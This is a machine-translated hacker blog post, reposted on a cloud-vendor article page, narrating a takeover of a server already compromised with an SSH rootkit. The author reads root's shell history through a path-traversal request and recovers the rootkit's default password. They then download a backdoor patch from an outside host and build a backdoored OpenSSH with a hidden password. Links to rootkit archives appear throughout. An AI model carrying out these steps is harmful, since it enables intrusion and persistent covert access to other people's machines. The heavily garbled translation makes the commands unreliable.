Home > Cloud Computing > Cloud Security

One Rootkit bot Test

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

Yaseng sent a packet containing ROOT permission for running and HTTPD such



DumbDraft? Tender BWhat is HTTPD with the ROOT permission of the J8 administrator? Isn't this clearly a day? Drafting? B's dumb.

It is intended to break HASH without CPU GUP

 

Okay, this is a dumb. Continue to check if NAMP has scanned me. It seems like there is one.DumbA hacker installs a backdoor.

What's the time when sshd v1 was used? Aren't you a shame ?? LINK TEST

  1. Brk <~> $ Ssh root @ xxoo-1 # SSH on port 22
  2. Protocol major versions differ: 1 vs. 2
  3. Brk <~> $ Ssh root @ xxoo-p 2010-1 # port 2012 SSH low-level version suspect Backdoor
  4. Root @ xxoo's password:

It is estimated that mafix SSH backdoor has been downloaded under the microscopic
Http://lucky.fuzzexp.org/file/r00tk1t/mafix.tar_shit.gz

SeeSSHDIR =/lib/libsh. soIncluding the read.DumbBackdoor

Find the password ~~

First look At the ROOT log source: http://fuzzexp.org/check_rk.html

  1. GET/sc8/photodownload? Filepath = .. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /root/. bash_history000000.html HTTP/1.1

I cannot find it. It is estimated to be-c.

Analyze the source code of ROOTKIT to see how the password is handled.

  1. Brk <~ /Desktop/ddrk> $ head setup
  2. #! /Bin/bash
  3.  
  4. ########## Define variables ##########
  5. DEFPASS = 123456
  6. VPC: DEFPORT = 43958
  7. BASEDIR = 'pwd'
  8. SSHDIR =/lib/libsh. so
  9. HOMEDIR =/usr/lib/libsh

The variable is DEFPASS.
Search

  1. Brk <~ /Desktop/ddrk> $ cat setup | grep DEFPASS
  2. DEFPASS = 123456
  3. Echo "No Password Specified, using default-$ DEFPASS"
  4. Echo-n $ DEFPASS | md5sum>/etc/sh. conf
  5. Brk <~ /Desktop/ddrk> $

The village is in/etc/sh. conf. MD5 encryption has fallen. Read it.

Your mom's BB and then MD5 decryption...

Logon successful

Next, delete the hacker's backdoor and keep my own backdoor as follows: install OPENSSH .. Source: http://fuzzexp.org/check_rk.html

  1. [Root @ SH-crew:/root] # ssh-v
  2. OpenSSH_4.3p2, OpenSSL 0.9.8e-fips-rhel5 01 Jul 2008
  3. Usage: ssh [-1246 AaCfgkMNnqsTtVvXxY] [-B bind_address] [-c cipher_spec]
  4. [-D [bind_address:] port] [-e escape_char] [-F configfile]
  5. [-I identity_file] [-L [bind_address:] port: host: hostport]
  6. [-L login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
  7. [-R [bind_address:] port: host: hostport] [-S ctl_path]
  8. [-W tunnel: tunnel] [user @] hostname [command]
  9. [Root @ SH-crew:/root] #

Download the source code ..

  1. [Root @ SH-crew:/root] # cd/tmp/
  2. [Root @ SH-crew:/tmp] # mkdir...
  3. [Root @ SH-crew:/tmp] # cd...
  4. [Root @ SH-crew:/tmp/...] # wget http://64studio.hivelocity.net/apt/pool/main/o/openssh/openssh_4.3p2.orig.tar.gz
  5. [Root @ SH-crew:/tmp/...] # tar xf openssh_4.3p2.orig.tar.gz
  6. [Root @ SH-crew:/tmp/...] # cd openssh-4.3p2/
  7. [Root @ SH-crew:/tmp/.../openssh-4.3p2] # wget http://lucky.fuzzexp.org/file/r00tk1t/openssh-5.5p1.patch/sshbd5.5p1.diff
  8. [Root @ SH-crew:/tmp/.../openssh-4.3p2] # patch <sshbd5.5p1. diff
  9. Patching file auth. c
  10. Hunk #1 succeeded at 243 (offset-28 lines ).
  11. Patching file auth-passwd.c
  12. Hunk #1 succeeded at 113 (offset-9 lines ).
  13. Patching file canohost. c
  14. Hunk #1 succeeded at 60 (offset-18 lines ).
  15. Patching file except des. h
  16. Hunk #1 succeeded at 211 (offset 39 lines ).
  17. Patching file sshconnect2.c
  18. Hunk #1 succeeded at 736 with fuzz 2 (offset-80 lines ).
  19. Patching file sshlogin. c
  20. Hunk #1 succeeded at 112 (offset-21 lines ).
  21. [Root @ SH-crew:/tmp/.../openssh-4.3p2] #

Next, edit the password and SSH Login and logout record file compilation.

  1. [Root @ SH-crew:/tmp/.../openssh-4.3p2] #./configure-prefix =/usr-sysconfdir =/etc/ssh
  2. [Root @ SH-crew:/tmp/.../openssh-4.3p2] # make & make install

Restart and log out of SSH

  1. [Root @ SH-crew:/tmp/.../openssh-4.3p2] # nano/etc/ssh/sshd_config
  2. [Root @ SH-crew:/tmp/.../openssh-4.3p2] # nano/etc/ssh/ssh_config
  3. [Root @ SH-crew:/tmp/.../openssh-4.3p2] #/etc/init. d/sshd restart
  4. [Root @ SH-crew:/tmp/.../openssh-4.3p2] exit

Then log on to 22 and enter the backdoor password Helenv5.

RightDumbThe hacker's backdoor has been deleted.

  1. [Root @ viewjpklibsh] # chmod-R 000 *
  2. [Root @ viewjpklibsh. so] # chmod-R 000 *

Port closed

  1. [Root @ viewjpklibsh] # iptables-I INPUT-j DROP-p tcp-dport 2010
  2. [Root @ viewjpklibsh] # iptables-save

Test Link

  1. Brk <~ /Files/ssh> $ nc-vv xxxxxxxxxxxxx 2010
  2. Connection to xxoo 2010 port [tcp/search] succeeded!
  3. SSH-1.5-2.0.13
  4. ^ C
  5. Brk <~ /Files/ssh> $ nc-vv xxxxxx 2010

Unable to connect

Delete the MOD. Don't ask me what I know.DumbRK only uses this source: http://fuzzexp.org/check_rk.html

  1. [Root @ viewjpklibsh] # modprobe-r ehci-hcd

Finally, send a picture ....


This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
rootkit download malwarebytes rootkit rootkit symptoms rootkit malware rootkit arsenal rootkit book rootkit detector
Related Article
How does personal cloud security guarantee data security?
Cloud security to achieve effective prevention of the future ...
Focus on three major cloud security areas, you know?
Decrypting Cisco type 5 password hashes
Using redis to write webshell

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More